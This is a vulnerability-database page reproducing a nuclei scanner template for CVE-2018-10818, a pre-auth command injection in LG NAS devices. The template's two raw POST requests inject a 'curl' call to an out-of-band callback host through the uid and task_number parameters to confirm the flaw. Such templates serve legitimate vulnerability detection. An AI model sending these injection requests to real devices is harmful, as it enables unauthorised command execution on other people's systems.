Lucene search
K

LG NAS Devices - Remote Code Execution

🗓️ 04 Feb 2026 07:00:26Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 225 Views

LG NAS Devices - Remote Code Execution. Pre-auth remote command injection via "password" parameter. Allows attacker to execute arbitrary code

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2018-14839
14 May 201900:00
attackerkb
Circl
CVE-2018-14839
14 Jun 202321:10
circl
CISA KEV Catalog
LG N1A1 NAS Remote Command Execution Vulnerability
25 Mar 202200:00
cisa_kev
Check Point Advisories
LG N1A1 Remote Code Execution (CVE-2018-14839)
3 Apr 202200:00
checkpoint_advisories
CVE
CVE-2018-10818
18 Nov 202321:47
cve
CVE
CVE-2018-14839
14 May 201920:01
cve
Cvelist
CVE-2018-14839
14 May 201920:01
cvelist
NVD
CVE-2018-14839
14 May 201921:29
nvd
OSV
CVE-2018-14839
14 May 201921:29
osv
Prion
Command injection
14 May 201921:29
prion
Rows per page
id: CVE-2018-10818

info:
  name: LG NAS Devices - Remote Code Execution
  author: gy741
  severity: critical
  description: LG NAS devices contain a pre-auth remote command injection via the "password" parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected device.
  remediation: |
    Apply the latest firmware update provided by LG to mitigate this vulnerability.
  reference:
    - https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/
    - https://medium.com/@0x616163/lg-n1a1-unauthenticated-remote-command-injection-cve-2018-14839-9d2cf760e247
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-10818
  classification:
    cve-id: CVE-2018-10818
  metadata:
    max-request: 2
  tags: cve,cve2018,lg-nas,rce,oast,injection,vuln
variables:
  useragent: '{{rand_base(6)}}'

http:
  - raw:
      - |
        POST /system/sharedir.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        &uid=10; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'
      - |
        POST /en/php/usb_sync.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        &act=sync&task_number=1;curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "User-Agent: {{useragent}}"
# digest: 4a0a0047304502204a0aad4c712ed6c236db59e27f29da72b95bcd27f5605d766773ff959dd4e2990221009d5f7b3b0073ecaa35c3f0bfc00b76304632b81f91e73922bb445afe713f8a90:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
9.5High risk
Vulners AI Score9.5
CVSS 27.5
CVSS 3.19.8
EPSS0.89354
SSVC
225